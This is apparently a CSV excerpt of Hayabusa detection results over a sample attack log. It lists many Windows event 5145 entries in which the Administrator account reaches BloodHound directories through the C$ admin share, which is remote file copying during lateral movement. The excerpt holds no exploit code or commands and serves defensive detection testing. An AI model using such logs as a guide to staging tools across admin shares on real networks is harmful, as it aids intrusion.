+2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\examples  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\examples\src  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\lib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\src  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\__tests__  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\config  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\node_modules  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\node_modules\react-prop-toggle  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group\utils  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\doc  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\doc\wg-meetings  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\lib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\lib\internal  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\regenerator-runtime  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src\shims  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src\utils  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\rimraf  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\safe-buffer  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler\cjs  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler\umd  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\setimmediate  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\signal-exit  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\ssf  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.359 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\ssf\bin  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.359 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-chain  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.359 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-chain\tests  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.369 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.369 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\filters  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.369 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\streamers  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.379 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\tests  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.379 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\utils  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.379 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\string_decoder  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\string_decoder\lib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\text-encoding  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\text-encoding\lib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse\examples  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse\test  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\example  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\test  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\test\server  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\unzipper  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist\es5  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist\esnext  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\src  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\src\schemes  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\tests  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\util-deprecate  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
